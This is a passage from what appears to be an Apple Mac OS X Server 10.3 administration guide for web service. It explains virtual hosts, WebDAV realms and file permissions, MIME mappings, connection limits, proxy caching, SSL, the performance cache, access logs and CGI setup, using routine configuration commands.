You can host more than one website simultaneously on your web server. Depending
on how you configure your sites, they may share the same domain name, IP address, or
port. The unique combination of domain name, IP address, and port identifies each
separate site. Your domain names must be registered with a domain name authority
such as InterNIC. Otherwise, the website associated with the domain won’t be visible
on the Internet. (There is a fee for each additional name you register.)
If you configure websites using multiple domain names and one IP address,
older browsers that do not support HTTP 1.1 (and therefore do not send the
“Host” request header) will not be able to access your sites. This is an
issue only with software released prior to 1997 and does not affect
modern browsers. If you think your users will
be using very old browser software, you’ll need to configure your sites with one
domain name per IP address.
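In Apache terms, each name/IP/port combination is a virtual host. A sketch
of the underlying idea (the host names, address, and paths are examples;
Server Admin normally writes this configuration for you):

NameVirtualHost 10.0.1.2:80
<VirtualHost 10.0.1.2:80>
    ServerName www.example.com
    DocumentRoot /Library/WebServer/Documents/example
</VirtualHost>
<VirtualHost 10.0.1.2:80>
    ServerName www.example2.com
    DocumentRoot /Library/WebServer/Documents/example2
</VirtualHost>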
Understanding WebDAV
If you use WebDAV to provide live authoring on your website, you should create realms
and set access privileges for users. Each site you host can be divided into a number of
realms, each with its own set of users and groups that have either browsing or
authoring privileges.
Defining Realms
When you define a realm, which is typically a folder (or directory), the access privileges
you set for the realm apply to all the contents of that directory. If a new realm is
defined for one of the folders within the existing realm, only the new realm privileges
apply to that folder and its contents. For information about creating realms and setting
access privileges, see “Setting Access for WebDAV-Enabled Sites” on page 31.
Setting WebDAV Privileges
The Apache process running on the server needs to have access to the website’s files
and folders. To provide this access, Mac OS X Server installs a user named “www” and a
group named “www” in the server’s Users & Groups List. The Apache processes that
serve webpages run as the www user and as members of the www group. You need to
give the www group read access to files within websites so that the server can transfer
the files to browsers when users connect to the sites. If you’re using WebDAV, the www
user and www group both need write access to the files and folders in the websites. In
addition, the www user and group need write access to the /var/run/davlocks directory.
Understanding WebDAV Security
WebDAV lets users update files in a website while the site is running. When WebDAV is
enabled, the web server must have write access to the files and folders within the site
users are updating. This has significant security implications when other sites are
running on the server, because individuals responsible for one site may be able to
modify other sites.
You can avoid this problem by carefully setting access privileges for the site files using
the Sharing module of the Workgroup Manager application. Mac OS X Server uses a
predefined group www, which contains the Apache processes. You need to give the
www group Read & Write access to files within the website. You also need to assign
these files Read & Write access by the website administrator (Owner) and No Access to
Everyone.
If you are concerned about website security, you may choose to leave WebDAV
disabled and use Apple file service or FTP service to modify the contents of a website
instead.
Understanding Multipurpose Internet Mail Extension
Multipurpose Internet Mail Extension (MIME) is an Internet standard for specifying what
happens when a web browser requests a file with certain characteristics. You can
choose the response you want the web server to make based on the file’s suffix. Your
choices will depend partly on what modules you have installed on your web server.
Each combination of a file suffix and its associated response is called a MIME type
mapping.
MIME Suffixes
A suffix describes the type of data in a file. Here are some examples:
• txt for text files
• cgi for Common Gateway Interface files
• gif for GIF (graphics) files
• php for PHP: Hypertext Preprocessor (embedded HTML scripts) used for
WebMail, and so on
• tiff for TIFF (graphics) files
Mac OS X Server includes a default set of MIME type suffixes. This set includes all the
suffixes in the mime.types file distributed with Apache, with a few additions. If a suffix
you need is not listed, or does not have the behavior you want, use Server Admin to
add the suffix to the set or to change its behavior.
Note: Do not add or change MIME suffixes by editing configuration files.
Web Server Responses (Content Handlers)
When a file is requested, the web server handles the file using the response specified
for the file’s suffix. Responses, also known as content handlers, can be either an action
or a MIME type. Possible responses include:
• Return file as MIME type (you enter the mapping you want to return)
• Send-as-is (send the file exactly as it exists)
• Cgi-script (run a CGI script you designate)
• Imap-file (generate an IMAP mail message)
• Mac-binary (download a compressed file in MacBinary format)
MIME type mappings are divided into two subfields separated by a forward slash, such
as text/plain. Mac OS X Server includes a list of default MIME type mappings. You can
edit these and add others.
When you specify a MIME type as a response, the server identifies the type of data
requested and sends the response you specify. For example, if the browser requests a
file with the suffix “jpg,” and its associated MIME type mapping is image/jpeg, the
server knows it needs to send an image file and that its format is JPEG. The server
doesn’t have to do anything except serve the data requested.
Actions are handled differently. If you’ve mapped an action to a suffix, your server runs
a program or script, and the result is served to the requesting browser. For example, if a
browser requests a file with the suffix “cgi,” and its associated response is the action
cgi-script, your server runs the script and returns the resulting data to the requesting
browser.
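For experienced Apache administrators: conceptually, each mapping
corresponds to a standard Apache directive. A sketch of the idea only (not
the exact file Server Admin generates, which the manual warns against
editing by hand):

AddType image/jpeg jpg jpeg
AddHandler cgi-script cgi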
2 Managing Web Technologies
Use Server Admin to set up web technologies initially
and to manage web settings and components.
If you are familiar with web servers and their content, you can use these summary
steps to get your web server started. If you’d like more detailed instructions for these
tasks, see the similar topics in “Using Server Admin to Manage Your Web Server” on
page 15 and Chapter 3, “Managing Websites,” on page 23.
Setting Up Your Web Server for the First Time
Step 1: Set up the Documents folder
When your server software is installed, a folder named Documents is set up
automatically in the WebServer directory. Put any items you want to make available
through a website in the Documents folder. You can create folders within the
Documents folder to organize the information. The folder is located in the directory
/Library/WebServer/Documents.
In addition, each registered user has a Sites folder in the user’s own home directory.
Any graphics or HTML pages stored in the user’s Sites folder will be served from the
URL server.example.com/~username/.
Step 2: Create a default page
Whenever users connect to your website, they see the default page. When you first
install the software, the file index.html in the Documents folder is the default page.
You’ll need to replace this file with the first page of your website and name it
index.html. If you want to call the file something else, make sure you add that name to
the list of default index files and move its name to the top of the list in the General
pane of the site settings window of Server Admin. See “Setting the Default Page for a
Website” on page 25 for instructions on specifying default index file names.
For more information about all website settings, see Chapter 3, “Managing Websites,”
on page 23.
Step 3: Assign privileges for your website
The Apache processes that serve webpages must have read access to the files, and
read/execute access to the folders. (In the case of folders, execute access means the
ability to read the names of files and folders contained in that particular folder.) Those
apache processes run as user www—a special user created specifically for Apache
when Mac OS X Server is installed. The user www is a member of the group www. So
for the Apache process to access the content of the website, the files and folders need
to be readable by user www.
Consequently, you need to give the www group at least read-only access to files within
your website so that it can transfer those files to browsers when users connect to the
site. You can do this by:
• Making the files and folders readable by everyone regardless of their user or group
ownership
• Making www the owner of files and folders and making sure that the files and folders
are readable by the owner
• Making the group www the owner of the files and folders and making sure that the
files and folders are readable by the group
For information about assigning privileges, see the file services administration guide.
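As a command-line sketch of the third option above (the path shown is the
default documents folder; adjust it for your site), you could grant the
www group read access this way:

sudo chgrp -R www /Library/WebServer/Documents
# g+rX adds group read throughout, and group execute on folders
# (and on any files that are already executable)
sudo chmod -R g+rX /Library/WebServer/Documents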
Step 4: Configure your web server
The default configuration works for most web servers that host a single website, but
you can configure all the basic features of web service and websites using Server
Admin. For more advanced configuration options, see Chapter 6, “Working With Open-
Source Applications,” on page 49.
To host user websites, you must configure at least one website.
To configure a site:
1 Open Server Admin.
2 Click Web in the list for the server you want.
3 Click Settings in the button bar.
4 In the Sites pane, click the Enabled button for the site you want to turn on.
5 Double-click the site name and choose the configuration options you want for the site.
For information about these settings, see “Using Server Admin to Manage Your Web
Server” on page 15 and Chapter 3, “Managing Websites,” on page 23.
Step 5: Start web service
1 Open Server Admin and click Web in the list below the server name.
2 Click Start Service in the toolbar.
Important: Always use Server Admin to start and stop the web server. You can start the
web server from the command line, but Server Admin won’t show the change in status
for several seconds. Server Admin is the preferred method to start and stop the web
server and modify web server settings.
Step 6: Connect to your website
To make sure the website is working properly, open your browser and try to connect to
your website over the Internet. If your site isn’t working correctly, see Chapter 8,
“Solving Problems,” on page 65.
Using Server Admin to Manage Your Web Server
The Server Admin application lets you set and modify most options for your web
server.
To access the web settings window:
1 In Server Admin, click Web in the list for the server you want.
2 Click Settings in the button bar.
Note: Click one of the five buttons at the top to see the settings in that pane.
3 Make the changes you want in settings.
4 Click Save.
The server restarts when you save your changes.
Starting or Stopping Web Service
You start and stop web service from the Server Admin application.
To start or stop web service:
1 In Server Admin, click Web in the list for the server you want.
2 Click Start Service or Stop Service in the toolbar.
If you stop web service, users connected to any website hosted on your server are
disconnected immediately.
Important: Always use Server Admin to start and stop the web server. You can start the
web server from the command line, but Server Admin won’t show the change in status
for several seconds. Server Admin is the preferred method to start and stop the web
server and modify web server settings.
Starting Web Service Automatically
Web service is set to start automatically (if it was running at shutdown) when the
server starts up. This will ensure that your websites are available if there’s been a power
failure or the server shuts down for any reason.
When you start web service in the Server Admin toolbar, the service starts
automatically each time the server restarts. If you turn off web service and then restart
the server, you must turn web service on again.
Modifying MIME Mappings and Content Handlers
Multipurpose Internet Mail Extension (MIME) is an Internet standard for describing the
contents of a file. The MIME Types pane lets you set up how your web server responds
when a browser requests certain file types. For more information about MIME types
and MIME type mappings, see “Understanding Multipurpose Internet Mail Extension”
on page 11.
Content handlers are Java programs used to manage different MIME type-subtype
combinations, such as text/plain and text/richtext.
The server includes the MIME type in its response to a browser to describe the
information being sent. The browser can then use its list of MIME preferences to
determine how to handle the information.
The server’s default MIME type is text/html, which specifies that a file contains HTML
text.
The web server is set up to handle the most common MIME types and content
handlers. You can add, edit, or delete MIME type and content handler mappings. In the
Server Admin application, these files are displayed in two lists: MIME Types and
Content Handlers. You can edit items in each list and add or delete items in either list.
To add or modify a MIME type or content handler mapping:
1 In Server Admin, click Web in the list for the server you want.
2 Click Settings in the button bar.
3 In the MIME Types pane, click the Add button below the appropriate list to add a new
mapping, or select a mapping and click the Delete or Edit button. (If you choose
Delete, you’ve finished.)
4 In the new sheet that appears, do one of the following:
• For a new MIME type, type each part of the name (separated by a slash), select the
suffix and type its name, use the Add button to add any suffixes you want, then click
OK.
• For a new content handler, type a name for the handler, select the suffix and type its
name, use the Add button to add any suffixes you want, then click OK.
• To edit a MIME type or content handler, change its name as desired, select the suffix
and change it as desired, add any suffixes you want using the Add button, then click
OK.
5 Click Save.
If you add or edit a handler that has Common Gateway Interface (CGI) script, make sure
you have enabled CGI execution for your site in the Options pane of the Settings/Sites
window.
Managing Connections
You can limit the period of time that users are connected to the server. In addition, you
can specify the number of connections to websites on the server at any one time.
Setting Simultaneous Connections for the Web Server
You can specify the number of simultaneous connections to your web server. When the
maximum number of connections is reached, new requests receive a message that the
server is busy.
Simultaneous connections are concurrent HTTP client connections. Browsers often
request several parts of a webpage at the same time, and each of those requests is a
connection. So a high number of simultaneous connections can be reached if the site
has pages with multiple elements and many users are trying to reach the server at
once.
To set the maximum number of connections to your web server:
1 In Server Admin, click Web for the server you want.
2 Click Settings in the button bar.
3 In the General pane, enter a number in the “Maximum simultaneous connections” field.
The range for maximum simultaneous connections is 1 to 2048. The default maximum
is 500, but you can set the number higher or lower, taking into consideration the
desired performance of your server.
4 Click Save.
Web service restarts.
Setting Persistent Connections for the Web Server
You can set up your web server to respond to multiple requests from a client computer
without closing the connection each time. Repeatedly opening and closing
connections isn’t very efficient and decreases performance.
Most browsers request a persistent connection from the server, and the server keeps
the connection open until the browser closes the connection. This means the browser
is using a connection even when no information is being transferred. You can allow
more persistent connections—and avoid sending a Server Busy message to other
users—by increasing the number of persistent connections allowed.
To set the number of persistent connections:
1 In Server Admin, click Web in the list for the server you want.
2 Click Settings in the button bar.
3 In the General pane, enter a new number in the “Maximum persistent
connections” field.
The range for maximum persistent connections is 1 to 2048. The default
setting of 500 provides good performance for most servers.
4 Click Save.
Web service restarts.
Setting a Connection Timeout Interval
You can specify a time period after which the server will drop a connection that is
inactive.
To set the connection timeout interval:
1 In Server Admin, click Web in the list for the server you want.
2 Click Settings in the button bar.
3 In the General pane, enter a number in the “Connection timeout” field to specify the
amount of time that can pass between requests before the session is disconnected by
the web server.
The range for connection timeout is 0 to 9999 seconds.
4 Click Save.
Web service restarts.
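For reference, these three General-pane settings line up with standard
Apache directives. The exact lines Server Admin writes may differ; this
correspondence is an assumption, shown as a sketch:

MaxClients 500    # maximum simultaneous connections
KeepAlive On      # allow persistent connections
Timeout 300       # seconds to wait before dropping an inactive connection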
Setting Up Proxy Caching
A proxy lets users check a local server for frequently used files. You can use a proxy to
speed up response times and reduce network traffic. The proxy stores recently accessed
files in a cache on your web server. Browsers on your network check the cache before
retrieving files from more distant servers.
To take advantage of this feature, client computers must specify your web server as
their proxy server in their browser preferences.
If you want to set up a web proxy, make sure you create and enable a website for the
proxy. You may wish to disable logging on the proxy site, or configure the site to record
its access log in a separate file from your other sites' access logs. The site does not have
to be on port 80, but setting up web clients is easier if it is because browsers use port
80 by default.
To set up a proxy:
1 In Server Admin, click Web for the server you want.
2 Click Settings in the button bar.
3 In the Proxy pane, click Enable Proxy.
4 Set the maximum cache size.
When the cache reaches this size, the oldest files are deleted from the cache folder.
5 Type the pathname for the cache folder in the “Cache folder” field.
You can also click the Browse button and browse for the folder you want to use.
If you are administering a remote server, file service must be running on the remote
server to use the Browse button.
If you change the folder location from the default, you will have to select the new
folder in the Finder, choose File > Get Info, and change the owner and group to www.
6 Click Save.
Web service restarts.
Note: If proxy is enabled, any site on the server can be used as the proxy.
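In Apache 1.3 terms, the proxy settings correspond roughly to mod_proxy
directives like the following (a sketch under that assumption; the cache
path and size are examples, and Server Admin manages the real values):

ProxyRequests On
CacheRoot "/var/run/proxy"
CacheSize 5000    # cache size in KB; oldest files are pruned first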
Blocking Websites From Your Web Server Cache
If your web server is set up to act as a proxy, you can prevent the server from caching
objectionable websites.
Important: To take advantage of this feature, client computers must specify your web
server as their proxy server in their browser preferences.
You can import a list of websites by dragging it to the list of sites. The
list must be a text file with the host names separated by commas or tabs
(comma-separated or tab-separated values, csv or tsv).
Make sure that the last entry in the file is terminated with a carriage return/line feed, or
it will be overlooked.
To block websites:
1 In Server Admin, click Web for the server you want.
2 Click Settings in the button bar.
3 In the Proxy pane, click Enable Proxy.
4 Do one of the following:
• Click the Add button, type the URL of the website you want to block in the Add field,
and click Add.
• Drag a list of websites (text file in comma-separated or tab-separated format) to the
“Blocked hosts” field.
5 Click Save.
Web service restarts.
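A blocked-hosts import file of the kind described above can be as simple
as one comma-separated line (the host names are placeholders; end the file
with a carriage return/line feed):

ads.example.com, tracker.example.net, www.example.org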
Using Secure Sockets Layer (SSL)
Secure Sockets Layer (SSL) provides security for a site and for its users by
authenticating the server, encrypting information, and maintaining message integrity.
About SSL
SSL was developed by Netscape and uses authentication and encryption
technology from RSA Data Security, Inc. For detailed information about the
SSL protocol, see:
• www.netscape.com/eng/ssl3/draft302.txt
• http://developer.netscape.com/misc/developer/conference/proceedings/cs2/
index.html
The SSL protocol is on a layer below application protocols (HTTP, for example) and
above TCP/IP. This means that when SSL is operating in the server and the client’s
software, all information is encrypted before being sent.
The Apache web server in Mac OS X Server supports SSLv2, SSLv3, and TLSv1. More
information about these protocol versions is available at www.modssl.org.
The Apache server in Mac OS X Server uses a public key-private key combination to
protect information. A browser encrypts information using a public key provided by
the server. Only the server has a private key that can decrypt that information.
When SSL is implemented on a server, a browser connects to it using the https prefix in
the URL, rather than http. The “s” indicates that the server is secure.
When a browser initiates a connection to an SSL-protected server, it connects to a
specific port (443) and sends a message that describes the encryption ciphers it
recognizes. The server responds with its strongest cipher, and the browser and server
then continue exchanging messages until the server determines the strongest cipher
both it and the browser recognize. Then the server sends its certificate (the Apache
web server uses an X.509 certificate) to the browser; this certificate
identifies the server, and the browser uses it to create an encryption
key. At this point a
secure connection has been established and the browser and server can exchange
encrypted information.
Using WebDAV
Web-based Distributed Authoring and Versioning (WebDAV) allows you or your users to
make changes to websites while the sites are running. You enable WebDAV for
individual sites, and you also need to assign access privileges for the sites and for the
web folders. See “Enabling WebDAV on Websites” on page 30 for details.
Using Tomcat
Tomcat adds Java servlet and JavaServer Pages (JSP) capabilities to Mac OS X Server.
Java servlets are Java-based applications that run on your server, in contrast to Java
applets, which run on the user’s computer. JavaServer Pages allows you to embed Java
servlets in your HTML pages.
You can set Tomcat to start automatically whenever the server starts up. This will
ensure that the Tomcat module starts up after a power failure or after the server shuts
down for any reason.
You can use Server Admin or the command-line tool to enable the Tomcat module. See
“Tomcat” on page 58 for more information about Tomcat and how to use it with your
web server.
Viewing Web Service Status
In Server Admin you can check the current state of the Apache server and which server
modules are active.
Web Service Overview
The overview in Server Admin shows server activity in summary form.
To view web service status overview:
1 Open Server Admin.
2 Click Overview in the button bar.
The Start/Stop Status Messages field displays a summary of server activity and the
server’s start date and time.
You can also view activity logs for each site on your server. See “Viewing Website
Settings” on page 34 for more information.
Web Service Modules in Use
You can view a list of modules in use on the server as well as modules that are available
but not in use.
To see which modules are enabled:
1 In Server Admin, click Web in the list for the server you want.
2 Click Settings in the button bar.
3 In the Modules pane, scroll to see the entire set of modules in use or available for use in
the server.
Viewing Logs of Web Service Activity
Web service in Mac OS X Server uses the standard Apache log format, so you can also
use any third-party log analysis tool to interpret the log data.
To view the log files:
1 In Server Admin, click Web in the list for the server you want.
2 Click Logs in the button bar.
3 Select the log you want to view in the list.
You can enable an access log and an error log for each site on the server. See “Enabling
Access and Error Logs for a Website” on page 27 for more information.
3 Managing Websites
Use the Server Admin application to set up and manage
the essential components of web service.
You administer websites on your server with Server Admin, an application that allows
you to establish settings, specify folders and paths, enable a variety of options, and
view the status of sites.
Using Server Admin to Manage Websites
The Sites pane in Server Admin lists your websites and provides some basic information
about each site. You use the Sites pane to add new sites or change settings for existing
sites.
To access the Sites pane:
m In Server Admin, click Web in the list for the server you want, click Settings in the
button bar, then click Sites.
The pane shows a list of sites on the server.
m To edit a site, double-click the site name.
Setting Up the Documents Folder for a Website
To make files available through a website, you put the files in the Documents folder for
the site. To organize the information, you can create folders inside the Documents
folder. The folder is located in the directory /Library/WebServer/Documents/.
In addition, each registered user has a Sites folder in the user’s own home directory.
Any graphics or HTML pages stored here will be served from the URL:
http://server.example.com/~username/.
To set up the Documents folder for your website:
1 Open the Documents folder on your web server.
If you have not changed the location of the Documents folder, it’s in this directory:
/Library/WebServer/Documents/.
2 Replace the index.html file with the main page for your website.
Make sure the name of your main page matches the default document name you set in
the General pane of the site’s Settings window. See “Setting the Default Page for a
Website” on page 25 for details.
3 Copy files you want to be available on your website to the Documents folder.
Enabling a Website on a Server
Before you can enable a website, you must create the content for the site and set up
your site folders.
To enable the website:
1 In Server Admin, click Web in the list for the server you want.
2 Click Settings in the button bar.
3 In the Sites pane, click the Add button to add a new site or click the Enabled button for
the site in the list that you want to enable. (If the site is already listed, you’re finished.)
4 In the General pane, type the fully qualified DNS name of your website in the Name
field.
5 Enter the IP address and port number (any number up to 8999) for the site.
The default port number is 80. Make sure that the number you choose is not already in
use by another service on the server.
Important: In order to enable your website on the server, the website must have a
unique name, IP address, and port number combination. See “Hosting More Than One
Website” on page 10 for more information.
6 Enter the path to the folder you set up for this website.
You can also click the Browse button and browse for the folder you want to use.
7 Enter the file name of your default document (the first page users see when they
access your site).
8 Make any other settings you want for this site, then click Save.
9 Click the back button at the top right side of the editing window.
10 Click the Enabled box next to the site name in the Sites pane.
11 Click Save.
Web service restarts.
Changing the Default Web Folder for a Site
A site’s default web folder is used as the root for the site. In other words, the default
folder is the top level of the directory structure for the site.
To change the default web folder for a site hosted on your server:
1 Log in to the server you want to administer.
2 Drag the contents of your previous web folder to your new web folder.
3 In Server Admin, click Web in the list for the server where the website is located.
4 Click Settings in the button bar.
5 In the Sites pane, double-click the site in the list.
6 Type the path to the web folder in the Web Folder field, or click the Browse button and
navigate to the new web folder location (if accessing this server remotely, file service
must be turned on to do this; see the file services administration guide for more
information).
7 Click Save.
Web service restarts.
Setting the Default Page for a Website
The default page appears when a user connects to your website by specifying a
directory or host name instead of a file name.
You can have more than one default page (called a default index file in Server Admin)
for a site. If multiple index files are listed for a site, the web server displays the one
highest in the list that is in the site’s folder.
To set the default webpage:
1 In Server Admin, click Web in the list for the server you want.
2 Click Settings in the button bar.
3 In the Sites pane, double-click the site in the list.
4 In the General pane, click the Add button and type a name in the “Default index files”
field. (Do not use any spaces in the name.)
A file with this name must be in the website folder.
5 To set the file as the one the server displays as its default page, drag that file to the top
of the list.
6 Click Save.
Web service restarts.
Note: If you plan to use only one index page for a site, you can leave index.html as the
default index file and change the content of the existing file with that name in /Library/
WebServer/Documents.
Changing the Access Port for a Website
By default, the server uses port 80 for connections to websites on your server. You may
need to change the port used for an individual website, for instance, if you want to set
up a streaming server on port 80. Make sure that the number you choose does not
conflict with ports already being used on the server (for FTP, Apple File Service, SMTP,
and others). If you change the port number for a website you must change all URLs
that point to the web server to include the new port number you choose.
To set the port for a website:
1 In Server Admin, click Web in the list for the server you want.
2 Click Settings in the button bar.
3 In the Sites pane, double-click the site in the list.
4 In the General pane, type the port number in the Port field.
5 Click Save.
Web service restarts.
Improving Performance of Static Websites
(Performance Cache)
If your websites contain static HTML files, and you expect high usage of the pages, you
can enable the performance cache to improve server performance. The performance
cache is enabled by default.
You should disable the performance cache if:
• You do not anticipate heavy usage of your website.
• Most of the pages on your website are generated dynamically.
Understanding the Effect of Using a Web Service
Performance Cache
Web service's performance cache is enabled by default and significantly improves
performance for most websites. Sites that benefit most from the performance cache
contain mostly static content and can fit entirely in RAM. Website content is cached in
system RAM and is accessed very quickly in response to client requests.
Enabling the performance cache does not always improve performance. For example,
when the amount of static web content exceeds the physical RAM of your server, using
a performance cache increases memory swapping, which degrades performance.
Also note that when your server is running other services that compete for physical
RAM, such as AFP, the web performance cache may be less effective or may impact the
performance of those other services.
To enable or disable the performance cache for your web server:
1 In Server Admin, click Web in the list for the server you want.
2 Click Settings in the button bar.
3 In the Sites pane, double-click the site in the list.
4 In the Options pane, click Performance Cache to change its state.
5 Click Save.
Web service restarts.
You can also improve server performance by disabling the access log.
Enabling Access and Error Logs for a Website
You can set up error and access logs for individual websites that you host on your
server. However, enabling the logs can slow server performance.
To enable access and error logs for a website:
1 In Server Admin, click Web in the list for the server you want.
2 Click Settings in the button bar.
3 In the Sites pane, double-click the site in the list.
4 In the Logging pane, check Enable Access Log to enable this log.
5 Set how often you want the logs to be archived by clicking the checkbox and typing a
number of days.
6 Type the path to the folder where you want to store the logs.
You can also click the Browse button to locate the folder you want to use.
If you are administering a remote server, file service must be running on the remote
server to use the Browse button.
7 Choose a log format from the Format pop-up menu.
8 Edit the format string, if necessary.
9 Enter archive, location, and level choices for the error log as desired.
10 Click Save.
Web service restarts.
Understanding the New Web Service access_log Format
In version 10.3 of Mac OS X Server, the web performance cache does not prevent a
remote client's IP address from being logged in the access_log. The web performance
cache process now adds an HTTP header named “PC-Remote-Addr” that contains the
client's IP address before passing a request to the Apache web server.
With the performance cache disabled, the standard log format string on the
CustomLog directive in httpd.conf remains the same as in earlier versions:
%h %l %u %t "%r" %>s %b
When the performance cache is enabled (default) the “%h” item will extract the local
machine's IP address. To extract the remote client's IP address, the log format string
needs to be modified as follows:
%{PC-Remote-Addr}i %l %u %t "%r" %>s %b
When you use the Server Admin application to enable and disable web performance
cache for each site (virtual host), the CustomLog directive in httpd.conf for each site is
adjusted automatically so your access logs should always contain the correct remote
client address.
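Put together in httpd.conf, a performance-cache-aware log configuration
consistent with the strings above might read as follows (the "pcache"
nickname and the log path are examples):

LogFormat "%{PC-Remote-Addr}i %l %u %t \"%r\" %>s %b" pcache
CustomLog "/var/log/httpd/access_log" pcache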
Setting Up Directory Listing for a Website
When users specify the URL for a directory, you can display either a
default webpage (such as index.html) or a list of the directory contents
(a folder list). To set up directory listing, you need to enable indexing
for the website.
Note: Folder listings are displayed only if no default document is found.
To enable indexing for a website:
1 In Server Admin, click Web in the list for the server you want.
2 Click Settings in the button bar.
3 In the Sites pane, double-click the site in the list.
4 In the Options pane, select Folder Listing.
5 Click Save.
Web service restarts.
Creating Indexes for Searching Website Content
Version 10.3 of Mac OS X Server continues to support the mod_sherlock_apple Apache
module, which allows web browsers to search the content of your website. As in
previous versions of the server, you must produce a content index before content
searching is possible.
Content indexes in earlier server versions had to be created in Sherlock. Now, you can
create content indexes using the Finder. Select the folder containing the files you want
to index, then choose File > Get Info. Click Content Index, then click Index Now. (You
can remove an index by using the Delete Index button in the Info window.)
In addition, there are new constraints that restrict the creation of index files. To create
an index, you must be the owner of the folder and must own any files in that folder
that are to be indexed. In the case of content in the /Library/WebServer/Documents
folder, the folder and all the files within it are owned by root. Even though the folder
and files are writable by members of the admin group, you must still be logged in as
root to create a content index.
Creating an index remotely or on a headless server is done using a command-line tool
named indexfolder. See the man pages for usage details. The operation of indexfolder
is affected by the login window. If nobody is logged in at the login window, the tool
must be run as root. If an administrator is logged in at the login window, the tool must
be run as that administrator. Otherwise, the tool will fail with messages similar to these:
kCGErrorIllegalArgument : initCGDisplayState: cannot map display interlocks.
kCGErrorIllegalArgument : CGSNewConnection cannot get connection port.
Whether done from the Finder or the indexfolder tool, content indexing creates a
folder named “.FBCIndex” either in the folder to be indexed or in one of its parent
folders.
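As a hedged example (check the indexfolder man page for the exact syntax),
indexing the default documents folder on a headless server with nobody
logged in might look like:

sudo indexfolder /Library/WebServer/Documents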
Connecting to Your Website
Once you configure your website, it’s a good idea to view the site with a web browser
to verify that everything appears as intended.
To make sure a website is working properly:
1 Open a web browser and type the web address of your server.
You can use either the IP address or the DNS name of the server.
2 Type the port number, if you are not using the default port.
3 If you’ve restricted access to specific users, enter a valid user name and password.
Enabling WebDAV on Websites
Web-based Distributed Authoring and Versioning (WebDAV) allows you or your users
to make changes to websites while the sites are running. If you enable WebDAV, you
also need to assign access privileges for the sites and for the web folders.
To enable WebDAV for a site:
1 In Server Admin, click Web in the list for the server you want.
2 Click Settings in the button bar.
3 In the Sites pane, double-click the site in the list.
4 In the Options pane, select WebDAV and click Save.
5 Click Realms. Double-click a realm to edit it, or click the Add button to create a new
realm.
The realm is the part of the website users can access.
6 Type the name you want users to see when they log in.
The default realm name is “untitled.”
7 If you want digest authentication for the realm, choose Digest from the Authorization
pop-up menu.
Basic authorization is on by default.
8 Type the path to the location in the website to which you want to limit access, and
click OK.
You can also click the Browse button to locate the folder you want to use.
If you are administering a remote server, file service must be running on the remote
server to use the Browse button.
9 Click Save.
Web service restarts.
Note: If you have turned off the WebDAV modules in the Modules pane of Server
Admin, you must turn them on again before WebDAV takes effect for a site. This is true
even if the WebDAV option is checked in the Options pane for the site. See “Apache
Modules” on page 61 for more about enabling modules.
Setting Access for WebDAV-Enabled Sites
You create realms to provide security for websites. Realms are locations within a site
that users can view or make changes to when WebDAV is enabled. When you define a
realm, you can assign browsing and authoring privileges to users of the realm.
To add users and groups to a realm:
1 In Server Admin, click Web in the list for the server you want.
2 Click Settings in the button bar.
3 In the Sites pane, double-click the site in the list.
4 In the Realms pane, select the realm you want to edit.
If no realm names are listed, create one using the instructions in “Enabling WebDAV on
Websites” on page 30.
5 To set access for all users, do one of the following:
• If you want all users to browse or author, or both, select Can Browse or Can Author
for Everyone.
When you select privileges for Everyone, you have these options:
Browse allows everyone who can access this realm to see it. You can add users and
groups to the User or Group list to enable authoring for them.
Browse and Author together allow everyone who has access to this realm to see and
make changes to it.
• If you want to assign access to specific users (and not to all users), do not select Can
Browse or Can Author for Everyone.
6 To specify access for individual users and groups, click Users & Groups to open a drawer
listing users and groups.
7 Click Users or Groups in the drawer’s button bar to show the list you want.
8 Drag user names to the Users field or group names to the Groups field.
Note: You can also use the add (+) button to open a sheet in which you type a user or
group name and select access options.
9 Select Can Browse and Can Author for each user and group as desired.
10 Click Save.
Web service restarts.
Use the Realms pane to delete a user or group by selecting the name and clicking the
Delete (–) button.
WebDAV and Web Content File and Folder Permissions
Mac OS X Server imposes the following constraints on web content files and folders
(which are located by default in /Library/WebServer/Documents):
• For security reasons, web content files and folders should not be writable by world.
• Web content files and folders are owned by user root and group admin by default, so
they are modifiable by any administrator but not by user or group www.
• To use WebDAV, web content files must be readable and writable by user or group
www, and folders must be readable, writable, and executable by user or group www.
• If you need to modify web content files and folders while you are logged in as an
administrator, those files or folders need to be modifiable by the administrator.
If you want to use WebDAV, you need to enable it in Server Admin and manually
change the web content files’ or folders’ ownership to user and group www. If you are
using WebDAV and you want to make changes to web content files or folders while
logged in as an administrator, you need to change the web content file and folder
permissions to admin, make your edits, and then restore the file and folder permissions
to www.
To add sites to your web server while using WebDAV:
1 Change the group privileges of the folder containing your websites to admin (default
folder location is /Library/WebServer/Documents).
2 Add your new site folder.
3 Change the group privileges of the folder containing your websites back to www.
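As a sketch, the group changes in steps 1 and 3 can be made in the Terminal application with the chgrp command, assuming the default folder location:
sudo chgrp admin /Library/WebServer/Documents
sudo chgrp www /Library/WebServer/Documents
Run the first command before adding your site folder and the second afterward.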
Enabling Integrated WebDAV Digest Authentication
You can enable digest authentication for WebDAV realms in the Realms pane of Server
Admin. See “Setting Access for WebDAV-Enabled Sites” on page 31 for more
information.
WebDAV and Web Performance Cache Conflict
If you enable both WebDAV and the web performance cache on one or more virtual
hosts (sites), WebDAV clients may encounter problems if they try to upload multiple
files in the Finder—the upload may fail to complete.
To avoid this problem, disable the web performance cache for virtual hosts with
WebDAV enabled. See “Improving Performance of Static Websites (Performance Cache)”
on page 26 for more information about the performance cache.
Enabling a Common Gateway Interface (CGI) Script
Common Gateway Interface (CGI) scripts (or programs) send information back and
forth between your website and applications that provide different services for the site.
• If a CGI is to be used by only one site, install the CGI in the Documents folder for the
site. The CGI name must end with the suffix “.cgi.”
• If a CGI is to be used by all sites on the server, install it in the /Library/WebServer/CGI-
Executables folder. In this case, clients must include /cgi-bin/ in the URL for the site.
For example, http://www.example.com/cgi-bin/test-cgi.
• Make sure the file permissions on the CGI allow it to be executed by the user named
“www.” Since the CGI typically isn’t owned by www, the file should be executable by
everyone.
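For example, to make a server-wide CGI executable by everyone from the Terminal application (test-cgi is the sample script named above; substitute your own file name):
sudo chmod 755 /Library/WebServer/CGI-Executables/test-cgi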
To enable a CGI for a website:
1 In Server Admin, click Web in the list for the server you want.
2 Click Settings in the button bar.
3 In the Sites pane, double-click the site in the list.
4 In the Options pane, select CGI Execution.
5 Click Save.
Web service restarts.
Enabling Server Side Includes (SSI)
Enabling Server Side Includes (SSI) allows a chunk of HTML code or other information
to be shared by different webpages on your site. SSIs can also function like CGIs and
execute commands or scripts on the server.
Note: Enabling SSI requires making changes to UNIX configuration files in the Terminal
